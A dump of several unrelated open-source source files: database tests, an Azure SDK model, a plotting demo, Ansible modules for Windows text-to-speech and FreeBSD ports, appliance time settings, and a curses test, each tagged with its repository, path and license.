error = self.thread1_error or self.thread2_error
self.assertTrue(isinstance(
error, psycopg2.extensions.TransactionRollbackError))
class QueryCancellationTests(ConnectingTestCase):
"""Tests for query cancellation."""
def setUp(self):
ConnectingTestCase.setUp(self)
self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE)
@skip_before_postgres(8, 2)
def test_statement_timeout(self):
curs = self.conn.cursor()
# Set a low statement timeout, then sleep for a longer period.
curs.execute('SET statement_timeout TO 10')
self.assertRaises(psycopg2.extensions.QueryCanceledError,
curs.execute, 'SELECT pg_sleep(50)')
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
| mit |
AutorestCI/azure-sdk-for-python | azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/account/models/capability_information.py | 1 | 2346 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CapabilityInformation(Model):
"""Subscription-level properties and limits for Data Lake Analytics.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar subscription_id: the subscription credentials that uniquely
identifies the subscription.
:vartype subscription_id: str
:ivar state: the subscription state. Possible values include:
'Registered', 'Suspended', 'Deleted', 'Unregistered', 'Warned'
:vartype state: str or
~azure.mgmt.datalake.analytics.account.models.SubscriptionState
:ivar max_account_count: the maximum supported number of accounts under
this subscription.
:vartype max_account_count: int
:ivar account_count: the current number of accounts under this
subscription.
:vartype account_count: int
:ivar migration_state: the Boolean value of true or false to indicate the
maintenance state.
:vartype migration_state: bool
"""
_validation = {
'subscription_id': {'readonly': True},
'state': {'readonly': True},
'max_account_count': {'readonly': True},
'account_count': {'readonly': True},
'migration_state': {'readonly': True},
}
_attribute_map = {
'subscription_id': {'key': 'subscriptionId', 'type': 'str'},
'state': {'key': 'state', 'type': 'str'},
'max_account_count': {'key': 'maxAccountCount', 'type': 'int'},
'account_count': {'key': 'accountCount', 'type': 'int'},
'migration_state': {'key': 'migrationState', 'type': 'bool'},
}
def __init__(self):
super(CapabilityInformation, self).__init__()
self.subscription_id = None
self.state = None
self.max_account_count = None
self.account_count = None
self.migration_state = None
| mit |
M4573R/BuildingMachineLearningSystemsWithPython | ch11/demo_mds.py | 25 | 3724 | # This code is supporting material for the book
# Building Machine Learning Systems with Python
# by Willi Richert and Luis Pedro Coelho
# published by PACKT Publishing
#
# It is made available under the MIT License
import os
import numpy as np
from matplotlib import pylab
from mpl_toolkits.mplot3d import Axes3D
from sklearn import linear_model, manifold, decomposition, datasets
logistic = linear_model.LogisticRegression()
from utils import CHART_DIR
np.random.seed(3)
# all examples will have three classes in this file
colors = ['r', 'g', 'b']
markers = ['o', 6, '*']
def plot_demo_1():
X = np.c_[np.ones(5), 2 * np.ones(5), 10 * np.ones(5)].T
y = np.array([0, 1, 2])
fig = pylab.figure(figsize=(10, 4))
ax = fig.add_subplot(121, projection='3d')
ax.set_axis_bgcolor('white')
mds = manifold.MDS(n_components=3)
Xtrans = mds.fit_transform(X)
for cl, color, marker in zip(np.unique(y), colors, markers):
ax.scatter(
Xtrans[y == cl][:, 0], Xtrans[y == cl][:, 1], Xtrans[y == cl][:, 2], c=color, marker=marker, edgecolor='black')
pylab.title("MDS on example data set in 3 dimensions")
ax.view_init(10, -15)
mds = manifold.MDS(n_components=2)
Xtrans = mds.fit_transform(X)
ax = fig.add_subplot(122)
for cl, color, marker in zip(np.unique(y), colors, markers):
ax.scatter(
Xtrans[y == cl][:, 0], Xtrans[y == cl][:, 1], c=color, marker=marker, edgecolor='black')
pylab.title("MDS on example data set in 2 dimensions")
filename = "mds_demo_1.png"
pylab.savefig(os.path.join(CHART_DIR, filename), bbox_inches="tight")
def plot_iris_mds():
iris = datasets.load_iris()
X = iris.data
y = iris.target
# MDS
fig = pylab.figure(figsize=(10, 4))
ax = fig.add_subplot(121, projection='3d')
ax.set_axis_bgcolor('white')
mds = manifold.MDS(n_components=3)
Xtrans = mds.fit_transform(X)
for cl, color, marker in zip(np.unique(y), colors, markers):
ax.scatter(
Xtrans[y == cl][:, 0], Xtrans[y == cl][:, 1], Xtrans[y == cl][:, 2], c=color, marker=marker, edgecolor='black')
pylab.title("MDS on Iris data set in 3 dimensions")
ax.view_init(10, -15)
mds = manifold.MDS(n_components=2)
Xtrans = mds.fit_transform(X)
ax = fig.add_subplot(122)
for cl, color, marker in zip(np.unique(y), colors, markers):
ax.scatter(
Xtrans[y == cl][:, 0], Xtrans[y == cl][:, 1], c=color, marker=marker, edgecolor='black')
pylab.title("MDS on Iris data set in 2 dimensions")
filename = "mds_demo_iris.png"
pylab.savefig(os.path.join(CHART_DIR, filename), bbox_inches="tight")
# PCA
fig = pylab.figure(figsize=(10, 4))
ax = fig.add_subplot(121, projection='3d')
ax.set_axis_bgcolor('white')
pca = decomposition.PCA(n_components=3)
Xtrans = pca.fit(X).transform(X)
for cl, color, marker in zip(np.unique(y), colors, markers):
ax.scatter(
Xtrans[y == cl][:, 0], Xtrans[y == cl][:, 1], Xtrans[y == cl][:, 2], c=color, marker=marker, edgecolor='black')
pylab.title("PCA on Iris data set in 3 dimensions")
ax.view_init(50, -35)
pca = decomposition.PCA(n_components=2)
Xtrans = pca.fit_transform(X)
ax = fig.add_subplot(122)
for cl, color, marker in zip(np.unique(y), colors, markers):
ax.scatter(
Xtrans[y == cl][:, 0], Xtrans[y == cl][:, 1], c=color, marker=marker, edgecolor='black')
pylab.title("PCA on Iris data set in 2 dimensions")
filename = "pca_demo_iris.png"
pylab.savefig(os.path.join(CHART_DIR, filename), bbox_inches="tight")
if __name__ == '__main__':
plot_demo_1()
plot_iris_mds()
| mit |
marc-sensenich/ansible | lib/ansible/modules/windows/win_say.py | 14 | 4157 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2016, Jon Hawkesworth (@jhawkesworth) <figs@unity.demon.co.uk>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_say
version_added: "2.3"
short_description: Text to speech module for Windows to speak messages and optionally play sounds
description:
- Uses .NET libraries to convert text to speech and optionally play .wav sounds. Audio Service needs to be running and some kind of speakers or
headphones need to be attached to the windows target(s) for the speech to be audible.
options:
msg:
description:
- The text to be spoken.
- Use either C(msg) or C(msg_file).
- Optional so that you can use this module just to play sounds.
type: str
msg_file:
description:
- Full path to a windows format text file containing the text to be spokend.
- Use either C(msg) or C(msg_file).
- Optional so that you can use this module just to play sounds.
type: path
voice:
description:
- Which voice to use. See notes for how to discover installed voices.
- If the requested voice is not available the default voice will be used.
Example voice names from Windows 10 are C(Microsoft Zira Desktop) and C(Microsoft Hazel Desktop).
type: str
default: system default voice
speech_speed:
description:
- How fast or slow to speak the text.
- Must be an integer value in the range -10 to 10.
- -10 is slowest, 10 is fastest.
type: int
default: 0
start_sound_path:
description:
- Full path to a C(.wav) file containing a sound to play before the text is spoken.
- Useful on conference calls to alert other speakers that ansible has something to say.
type: path
end_sound_path:
description:
- Full path to a C(.wav) file containing a sound to play after the text has been spoken.
- Useful on conference calls to alert other speakers that ansible has finished speaking.
type: path
notes:
- Needs speakers or headphones to do anything useful.
- |
To find which voices are installed, run the following Powershell commands.
Add-Type -AssemblyName System.Speech
$speech = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer
$speech.GetInstalledVoices() | ForEach-Object { $_.VoiceInfo }
$speech.Dispose()
- Speech can be surprisingly slow, so it's best to keep message text short.
seealso:
- module: win_msg
- module: win_toast
author:
- Jon Hawkesworth (@jhawkesworth)
'''
EXAMPLES = r'''
- name: Warn of impending deployment
win_say:
msg: Warning, deployment commencing in 5 minutes, please log out.
- name: Using a different voice and a start sound
win_say:
start_sound_path: C:\Windows\Media\ding.wav
msg: Warning, deployment commencing in 5 minutes, please log out.
voice: Microsoft Hazel Desktop
- name: With start and end sound
win_say:
start_sound_path: C:\Windows\Media\Windows Balloon.wav
msg: New software installed
end_sound_path: C:\Windows\Media\chimes.wav
- name: Text from file example
win_say:
start_sound_path: C:\Windows\Media\Windows Balloon.wav
msg_file: AppData\Local\Temp\morning_report.txt
end_sound_path: C:\Windows\Media\chimes.wav
'''
RETURN = r'''
message_text:
description: The text that the module attempted to speak.
returned: success
type: str
sample: "Warning, deployment commencing in 5 minutes."
voice:
description: The voice used to speak the text.
returned: success
type: str
sample: Microsoft Hazel Desktop
voice_info:
description: The voice used to speak the text.
returned: when requested voice could not be loaded
type: str
sample: Could not load voice TestVoice, using system default voice
'''
| gpl-3.0 |
msfrank/Higgins | higgins/signals.py | 1 | 1459 | # Higgins - A multi-media server
# Copyright (c) 2007-2009 Michael Frank <msfrank@syntaxjockey.com>
#
# This program is free software; for license information see
# the COPYING file.
from twisted.internet.defer import Deferred
from higgins.logger import Loggable
class SignalDisconnected(Exception):
pass
class Signal(object, Loggable):
log_domain = "signal"
def __init__(self):
self.receivers = {}
def matches(self, kwds):
"""
Override this method in your signal subclass if you want to do keyword
matching of signal receivers. If you don't override this method, then
all receivers will match when the signal is fired.
"""
return True
def connect(self, **kwds):
"""Connect to a signal. Returns a deferred."""
d = Deferred()
d.kwds = kwds
self.receivers[d] = d
return d
def _onDisconnect(self, failure):
pass
def disconnect(self, d):
"""Disconnect a receiver from a signal."""
if d in self.receivers:
d.addErrback(self._onDisconnect)
d.errback(SignalDisconnected())
del self.receivers[d]
def signal(self, result):
"""Signal all registered receivers."""
self.log_debug("signaling receivers")
for d in self.receivers.values():
if self.matches(d.kwds):
d.callback(result)
del self.receivers[d]
| lgpl-2.1 |
maxikov/smartspacedatan | v3/dataprovider.py | 3 | 5376 | #!/usr/bin/env python
import dataloader
import pickle
import os.path
import dataloader
import dataprocessor
import numpy
class DataProvider(object):
def __init__(self, order=1, use_pca=False, pca_nodes_path=None,
db_host="localhost", db_user="root", db_password="",
db_name="andrew", device_list=None, start_time=None,
stop_time=None, debug=False, group_by = 60,
device_groupping = "dict", eliminate_const_one=True,
dtype="float64",
raw_readings_norm_coeffs = {"temp": 1, "light": 1,
"humidity" : 1, "pressure": 1,
"audio_p2p": 1, "motion" : 1}):
self.debug = debug
self.order = order
self.dtype = dtype
self.use_pca = use_pca
self.raw_readings_norm_coeffs = raw_readings_norm_coeffs
self.eliminate_const_one = eliminate_const_one
self.pca_nodes_path = pca_nodes_path
if self.use_pca and not self.pca_nodes_path:
raise Exception("PCA is planned to be used, but PCA nodes path is not specified")
if pca_nodes_path:
self.pca_nodes_filename = os.path.join(self.pca_nodes_path, "%d_order_pnode.p" % self.order)
else:
self.pca_nodes_filename = None
if self.use_pca:
if debug:
print "Loading PCA node from", self.pca_nodes_filename
f = open(self.pca_nodes_filename, "rb")
self.pnode = pickle.load(f)
f.close()
if debug:
print "Loading PCA node done"
self.db_host = db_host
self.db_user = db_user
self.db_password = db_password
self.db_name = db_name
self.data_loader = dataloader.DataLoader(mysql_user = self.db_user, mysql_password = self.db_password, mysql_host = self.db_host, mysql_db = self.db_name)
if start_time and stop_time and device_list:
self.start_time = start_time
self.stop_time = stop_time
self.device_list = device_list
else:
min_t, max_t = self.data_loader.get_min_max_timestamps()
if not start_time:
self.start_time = min_t
if debug:
print "Start time not specified, using %d instead" % self.start_time
else:
self.start_time = start_time
if not stop_time:
self.stop_time = max_t
if debug:
print "Stop time not specified, using %d instead" % self.stop_time
else:
self.stop_time = stop_time
if not device_list:
self.device_list = self.data_loader.fetch_all_macs()
if debug:
print "Device list not specified, using all available instad:"
for device in self.device_list:
print "\t", device
else:
self.device_list = device_list
self.group_by = group_by
self.device_groupping = device_groupping
self._start_t = self.start_time
self._end_t = self.start_time + self.group_by
def __iter__(self):
return self
def next(self):
if self._end_t >= self.stop_time:
raise StopIteration
res = {}
while not res:
if self.debug:
_t = (self._start_t + self._end_t)/2.0
percent = 100.0 * (_t - self.start_time)/float((self.stop_time - self.start_time))
print "Processing from", self._start_t, "to", self._end_t, "(", percent, " % done)"
for device in self.device_list:
if self.debug:
print "Processing device", device
count, data = self.data_loader.load_data_bundle_normalized(self._start_t, self._end_t, device, self.raw_readings_norm_coeffs)
if count > 0:
res[device] = data
if self.debug:
print "Loaded", count, "readings"
elif self.debug:
print "No data, skipped"
if not res:
if self.debug:
print "No data at all, skipping"
self._start_t = self._end_t
self._end_t = self._start_t + self.group_by
if self._end_t >= self.stop_time:
raise StopIteration
for (device, data) in res.items():
if self.debug:
print "\nProcessing device", device
print "Number of readings", len(data)
print "Number of raw features:", len(data[0])-1
print "Extracting features"
uz_data = dataprocessor.unzip_data_bundle(data)
time_and_feats = dataprocessor.extract_all_features_from_sensors(uz_data)
if self.debug:
print len(time_and_feats) - 1, "features extracted"
if self.debug:
print "Building polynomial features of order", self.order
_time, pols = dataprocessor.build_polynomial_features(time_and_feats, order=self.order)
if self.eliminate_const_one:
pols = pols[:,1:]
if self.debug:
print "Eliminating constant 1 from features"
n_pol_feats = pols.size
if self.debug:
print "%d polynomial features created" % n_pol_feats
res[device] = _time, pols
if self.use_pca:
if self.debug:
print "Applying PCA"
res[device] = _time, self.pnode.execute(res[device][1])
self._start_t = self._end_t
self._end_t = self._start_t + self.group_by
if self.device_groupping == "dict":
return res
elif self.device_groupping == "numpy_matrix":
arr = numpy.empty([len(res), n_pol_feats], dtype=self.dtype)
for i in xrange(len(res)):
arr[i] = res.values()[i][1][0]
return arr
def main():
numpy.set_printoptions(precision=1, linewidth=120, threshold=20, edgeitems=5)
dataprov = DataProvider(order=1, use_pca = False, pca_nodes_path="../v2/results/2013_10_20_22_svd_true", debug=True, start_time = 1379984887, stop_time = 1379985187, device_list = ["17030002", "17030003", "17030004"], eliminate_const_one=True, device_groupping="numpy_matrix")
for data in dataprov:
if False:
for device, d in data.items():
print device, d
print data
if __name__ == "__main__":
main()
| gpl-3.0 |
chrrrles/ansible-modules-extras | packaging/os/portinstall.py | 79 | 6913 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, berenddeboer
# Written by berenddeboer <berend@pobox.com>
# Based on pkgng module written by bleader <bleader at ratonland.org>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: portinstall
short_description: Installing packages from FreeBSD's ports system
description:
- Manage packages for FreeBSD using 'portinstall'.
version_added: "1.3"
options:
name:
description:
- name of package to install/remove
required: true
state:
description:
- state of the package
choices: [ 'present', 'absent' ]
required: false
default: present
use_packages:
description:
- use packages instead of ports whenever available
choices: [ 'yes', 'no' ]
required: false
default: yes
author: "berenddeboer (@berenddeboer)"
'''
EXAMPLES = '''
# Install package foo
- portinstall: name=foo state=present
# Install package security/cyrus-sasl2-saslauthd
- portinstall: name=security/cyrus-sasl2-saslauthd state=present
# Remove packages foo and bar
- portinstall: name=foo,bar state=absent
'''
import json
import shlex
import os
import sys
def query_package(module, name):
pkg_info_path = module.get_bin_path('pkg_info', False)
# Assume that if we have pkg_info, we haven't upgraded to pkgng
if pkg_info_path:
pkgng = False
pkg_glob_path = module.get_bin_path('pkg_glob', True)
rc, out, err = module.run_command("%s -e `pkg_glob %s`" % (pkg_info_path, pipes.quote(name)), use_unsafe_shell=True)
else:
pkgng = True
pkg_info_path = module.get_bin_path('pkg', True)
pkg_info_path = pkg_info_path + " info"
rc, out, err = module.run_command("%s %s" % (pkg_info_path, name))
found = rc == 0
if not found:
# databases/mysql55-client installs as mysql-client, so try solving
# that the ugly way. Pity FreeBSD doesn't have a fool proof way of checking
# some package is installed
name_without_digits = re.sub('[0-9]', '', name)
if name != name_without_digits:
if pkgng:
rc, out, err = module.run_command("%s %s" % (pkg_info_path, name_without_digits))
else:
rc, out, err = module.run_command("%s %s" % (pkg_info_path, name_without_digits))
found = rc == 0
return found
def matching_packages(module, name):
ports_glob_path = module.get_bin_path('ports_glob', True)
rc, out, err = module.run_command("%s %s" % (ports_glob_path, name))
#counts the numer of packages found
occurrences = out.count('\n')
if occurrences == 0:
name_without_digits = re.sub('[0-9]', '', name)
if name != name_without_digits:
rc, out, err = module.run_command("%s %s" % (ports_glob_path, name_without_digits))
occurrences = out.count('\n')
return occurrences
def remove_packages(module, packages):
remove_c = 0
pkg_glob_path = module.get_bin_path('pkg_glob', True)
# If pkg_delete not found, we assume pkgng
pkg_delete_path = module.get_bin_path('pkg_delete', False)
if not pkg_delete_path:
pkg_delete_path = module.get_bin_path('pkg', True)
pkg_delete_path = pkg_delete_path + " delete -y"
# Using a for loop incase of error, we can report the package that failed
for package in packages:
# Query the package first, to see if we even need to remove
if not query_package(module, package):
continue
rc, out, err = module.run_command("%s `%s %s`" % (pkg_delete_path, pkg_glob_path, pipes.quote(package)), use_unsafe_shell=True)
if query_package(module, package):
name_without_digits = re.sub('[0-9]', '', package)
rc, out, err = module.run_command("%s `%s %s`" % (pkg_delete_path, pkg_glob_path, pipes.quote(name_without_digits)),use_unsafe_shell=True)
if query_package(module, package):
module.fail_json(msg="failed to remove %s: %s" % (package, out))
remove_c += 1
if remove_c > 0:
module.exit_json(changed=True, msg="removed %s package(s)" % remove_c)
module.exit_json(changed=False, msg="package(s) already absent")
def install_packages(module, packages, use_packages):
install_c = 0
# If portinstall not found, automagically install
portinstall_path = module.get_bin_path('portinstall', False)
if not portinstall_path:
pkg_path = module.get_bin_path('pkg', False)
if pkg_path:
module.run_command("pkg install -y portupgrade")
portinstall_path = module.get_bin_path('portinstall', True)
if use_packages == "yes":
portinstall_params="--use-packages"
else:
portinstall_params=""
for package in packages:
if query_package(module, package):
continue
# TODO: check how many match
matches = matching_packages(module, package)
if matches == 1:
rc, out, err = module.run_command("%s --batch %s %s" % (portinstall_path, portinstall_params, package))
if not query_package(module, package):
module.fail_json(msg="failed to install %s: %s" % (package, out))
elif matches == 0:
module.fail_json(msg="no matches for package %s" % (package))
else:
module.fail_json(msg="%s matches found for package name %s" % (matches, package))
install_c += 1
if install_c > 0:
module.exit_json(changed=True, msg="present %s package(s)" % (install_c))
module.exit_json(changed=False, msg="package(s) already present")
def main():
module = AnsibleModule(
argument_spec = dict(
state = dict(default="present", choices=["present","absent"]),
name = dict(aliases=["pkg"], required=True),
use_packages = dict(type='bool', default='yes')))
p = module.params
pkgs = p["name"].split(",")
if p["state"] == "present":
install_packages(module, pkgs, p["use_packages"])
elif p["state"] == "absent":
remove_packages(module, pkgs)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
IBM-Security/ibmsecurity | ibmsecurity/isam/base/date_time.py | 1 | 4844 | import logging
import ibmsecurity.utilities.tools
logger = logging.getLogger(__name__)
requires_model="Appliance"
def get(isamAppliance, check_mode=False, force=False):
"""
Retrieving the current date and time settings
"""
return isamAppliance.invoke_get("Retrieving the current date and time settings",
"/time_cfg", requires_model=requires_model)
def get_timezones(isamAppliance, check_mode=False, force=False):
"""
Retrieving the list of valid timezones
"""
return isamAppliance.invoke_get("Retrieving the list of valid timezones",
"/time_cfg/I18nTimezone", requires_model=requires_model)
def set(isamAppliance, ntpServers="", timeZone="America/New_York", enableNtp=False, dateTime=None, check_mode=False, force=False):
"""
Update date/time settings (set NTP server and timezone)
"""
if dateTime is None:
dateTime = "0000-00-00 00:00:00"
check_value, warnings = _check(isamAppliance=isamAppliance, timeZone=timeZone, ntpServers=ntpServers, enableNtp=enableNtp)
if force is True or check_value is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True, warnings=warnings)
else:
return isamAppliance.invoke_put(
"Setting date/time settings (NTP)",
"/time_cfg",
{
"dateTime": dateTime,
"timeZone": timeZone,
"enableNtp": enableNtp,
"ntpServers": ntpServers
},
requires_model=requires_model
)
return isamAppliance.create_return_object(warnings=warnings)
def disable(isamAppliance, check_mode=False, force=False):
"""
Disable NTP settings, leaves all other settings intact
"""
ret_obj = get(isamAppliance)
warnings = ret_obj['warnings']
if warnings != []:
if "Docker" in warnings[0]:
return isamAppliance.create_return_object(warnings=warnings)
if force is True or ret_obj['data']['ntpConfig']['enableNtp'] == True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True, warnings=warnings)
else:
return isamAppliance.invoke_put(
"Setting date/time settings (NTP)",
"/time_cfg",
{
'dateTime': ret_obj['data']['dateTime'],
'timeZone': ret_obj['data']['timeZone'],
'enableNtp': False,
'ntpServers': ','.join(ns['ntpServer'] for ns in ret_obj['data']['ntpConfig']['ntpServers'])
},
requires_model=requires_model
)
return isamAppliance.create_return_object(warnings=warnings)
def _check(isamAppliance, timeZone, ntpServers, enableNtp):
"""
Check if NTP is already set for syncing date/time
If timezone or ntpservers provided then also check if those values match what is currently set
"""
ret_obj = get(isamAppliance)
warnings=ret_obj['warnings']
if warnings != []:
if "Docker" in warnings[0]:
return True, warnings
if ret_obj['data']['ntpConfig']['enableNtp'] != enableNtp:
return False, warnings
if timeZone != ret_obj['data']['timeZone']:
logger.info("Existing timeZone is different")
return False, warnings
if ntpServers != None:
existing_ntpServers = list()
for ntps in ret_obj['data']['ntpConfig']['ntpServers']:
existing_ntpServers.append(ntps['ntpServer'])
logger.debug(str(sorted(existing_ntpServers)))
logger.debug(str(sorted(ntpServers.split(','))))
if sorted(ntpServers.split(',')) != sorted(existing_ntpServers):
logger.debug("Existing ntpServers are different")
return False, warnings
return True, warnings
def compare(isamAppliance1, isamAppliance2):
"""
Compare date/time settings between two appliances
"""
ret_obj1 = get(isamAppliance1)
ret_obj2 = get(isamAppliance2)
if ret_obj1['warnings'] != []:
if 'Docker' in ret_obj1['warnings'][0]:
return isamAppliance1.create_return_object(warnings=ret_obj1['warnings'])
if ret_obj2['warnings'] != []:
if 'Docker' in ret_obj2['warnings'][0]:
return isamAppliance2.create_return_object(warnings=ret_obj2['warnings'])
# Ignore actual date / time on servers - they should be same if synced correctly
if 'dateTime' in ret_obj1['data']:
del ret_obj1['data']['dateTime']
if 'dateTime' in ret_obj2['data']:
del ret_obj2['data']['dateTime']
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=['datetime'])
| apache-2.0 |
wavesoft/LiveQ | liveq-dashboard/liveq-dashboard.py | 1 | 1629 | #!/usr/bin/python
################################################################
# LiveQ - An interactive volunteering computing batch system
# Copyright (C) 2013 Ioannis Charalampidis
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
################################################################
# ----------
import sys
sys.path.append("../liveq-common")
# ----------
import logging
import time
import signal
import sys
from dashboard.config import Config
from dashboard.component import DashboardComponent
from liveq import handleSIGINT, exit
from liveq.events import GlobalEvents
from liveq.exceptions import ConfigException
# Prepare runtime configuration
runtimeConfig = { }
# Load configuration
try:
Config.fromFile( "config/jobmanager.conf.local", runtimeConfig )
except ConfigException as e:
print("ERROR Configuration exception: %s" % e)
exit(1)
# Hook sigint -> Shutdown
handleSIGINT()
# Start job manager
JobManagerComponent.runThreaded()
| gpl-2.0 |
mancoast/CPythonPyc_test | cpython/220_test_curses.py | 10 | 6038 | #
# Test script for the curses module
#
# This script doesn't actually display anything very coherent. but it
# does call every method and function.
#
# Functions not tested: {def,reset}_{shell,prog}_mode, getch(), getstr(),
# getmouse(), ungetmouse(), init_color()
#
import curses, sys, tempfile
# Optionally test curses module. This currently requires that the
# 'curses' resource be given on the regrtest command line using the -u
# option. If not available, nothing after this line will be executed.
import test_support
test_support.requires('curses')
def window_funcs(stdscr):
"Test the methods of windows"
win = curses.newwin(10,10)
win = curses.newwin(5,5, 5,5)
win2 = curses.newwin(15,15, 5,5)
for meth in [stdscr.addch, stdscr.addstr]:
for args in [('a'), ('a', curses.A_BOLD),
(4,4, 'a'), (5,5, 'a', curses.A_BOLD)]:
apply(meth, args)
for meth in [stdscr.box, stdscr.clear, stdscr.clrtobot,
stdscr.clrtoeol, stdscr.cursyncup, stdscr.delch,
stdscr.deleteln, stdscr.erase, stdscr.getbegyx,
stdscr.getbkgd, stdscr.getkey, stdscr.getmaxyx,
stdscr.getparyx, stdscr.getyx, stdscr.inch,
stdscr.insertln, stdscr.instr, stdscr.is_wintouched,
win.noutrefresh, stdscr.redrawwin, stdscr.refresh,
stdscr.standout, stdscr.standend, stdscr.syncdown,
stdscr.syncup, stdscr.touchwin, stdscr.untouchwin]:
meth()
stdscr.addnstr('1234', 3)
stdscr.addnstr('1234', 3, curses.A_BOLD)
stdscr.addnstr(4,4, '1234', 3)
stdscr.addnstr(5,5, '1234', 3, curses.A_BOLD)
stdscr.attron(curses.A_BOLD)
stdscr.attroff(curses.A_BOLD)
stdscr.attrset(curses.A_BOLD)
stdscr.bkgd(' ')
stdscr.bkgd(' ', curses.A_REVERSE)
stdscr.bkgdset(' ')
stdscr.bkgdset(' ', curses.A_REVERSE)
win.border(65, 66, 67, 68,
69, 70, 71, 72)
win.border('|', '!', '-', '_',
'+', '\\', '#', '/')
try:
win.border(65, 66, 67, 68,
69, [], 71, 72)
except TypeError:
pass
else:
raise RuntimeError, "Expected win.border() to raise TypeError"
stdscr.clearok(1)
win4 = stdscr.derwin(2,2)
win4 = stdscr.derwin(1,1, 5,5)
win4.mvderwin(9,9)
stdscr.echochar('a')
stdscr.echochar('a', curses.A_BOLD)
stdscr.hline('-', 5)
stdscr.hline('-', 5, curses.A_BOLD)
stdscr.hline(1,1,'-', 5)
stdscr.hline(1,1,'-', 5, curses.A_BOLD)
stdscr.idcok(1)
stdscr.idlok(1)
stdscr.immedok(1)
stdscr.insch('c')
stdscr.insdelln(1)
stdscr.insnstr('abc', 3)
stdscr.insnstr('abc', 3, curses.A_BOLD)
stdscr.insnstr(5, 5, 'abc', 3)
stdscr.insnstr(5, 5, 'abc', 3, curses.A_BOLD)
stdscr.insstr('def')
stdscr.insstr('def', curses.A_BOLD)
stdscr.insstr(5, 5, 'def')
stdscr.insstr(5, 5, 'def', curses.A_BOLD)
stdscr.is_linetouched(0)
stdscr.keypad(1)
stdscr.leaveok(1)
stdscr.move(3,3)
win.mvwin(2,2)
stdscr.nodelay(1)
stdscr.notimeout(1)
win2.overlay(win)
win2.overwrite(win)
stdscr.redrawln(1,2)
stdscr.scrollok(1)
stdscr.scroll()
stdscr.scroll(2)
stdscr.scroll(-3)
stdscr.setscrreg(10,15)
win3 = stdscr.subwin(10,10)
win3 = stdscr.subwin(10,10, 5,5)
stdscr.syncok(1)
stdscr.timeout(5)
stdscr.touchline(5,5)
stdscr.touchline(5,5,0)
stdscr.vline('a', 3)
stdscr.vline('a', 3, curses.A_STANDOUT)
stdscr.vline(1,1, 'a', 3)
stdscr.vline(1,1, 'a', 3, curses.A_STANDOUT)
if hasattr(curses, 'resize'):
stdscr.resize()
if hasattr(curses, 'enclose'):
stdscr.enclose()
def module_funcs(stdscr):
"Test module-level functions"
for func in [curses.baudrate, curses.beep, curses.can_change_color,
curses.cbreak, curses.def_prog_mode, curses.doupdate,
curses.filter, curses.flash, curses.flushinp,
curses.has_colors, curses.has_ic, curses.has_il,
curses.isendwin, curses.killchar, curses.longname,
curses.nocbreak, curses.noecho, curses.nonl,
curses.noqiflush, curses.noraw,
curses.reset_prog_mode, curses.termattrs,
curses.termname, curses.erasechar, curses.getsyx]:
func()
# Functions that actually need arguments
curses.curs_set(1)
curses.delay_output(1)
curses.echo() ; curses.echo(1)
f = tempfile.TemporaryFile()
stdscr.putwin(f)
f.seek(0)
curses.getwin(f)
f.close()
curses.halfdelay(1)
curses.intrflush(1)
curses.meta(1)
curses.napms(100)
curses.newpad(50,50)
win = curses.newwin(5,5)
win = curses.newwin(5,5, 1,1)
curses.nl() ; curses.nl(1)
curses.putp('abc')
curses.qiflush()
curses.raw() ; curses.raw(1)
curses.setsyx(5,5)
curses.setupterm(fd=sys.__stdout__.fileno())
curses.tigetflag('hc')
curses.tigetnum('co')
curses.tigetstr('cr')
curses.tparm('cr')
curses.typeahead(sys.__stdin__.fileno())
curses.unctrl('a')
curses.ungetch('a')
curses.use_env(1)
# Functions only available on a few platforms
if curses.has_colors():
curses.start_color()
curses.init_pair(2, 1,1)
curses.color_content(1)
curses.color_pair(2)
curses.pair_content(curses.COLOR_PAIRS)
curses.pair_number(0)
if hasattr(curses, 'keyname'):
curses.keyname(13)
if hasattr(curses, 'has_key'):
curses.has_key(13)
if hasattr(curses, 'getmouse'):
curses.mousemask(curses.BUTTON1_PRESSED)
curses.mouseinterval(10)
def main(stdscr):
curses.savetty()
try:
module_funcs(stdscr)
window_funcs(stdscr)
finally:
curses.resetty()
if __name__ == '__main__':
curses.wrapper(main)
else:
try:
stdscr = curses.initscr()
main(stdscr)
finally:
curses.endwin()
| gpl-3.0 |
samkuehn/box-python-sdk | test/unit/object/test_metadata.py | 5 | 3440 | # coding: utf-8
from __future__ import unicode_literals
import json
import pytest
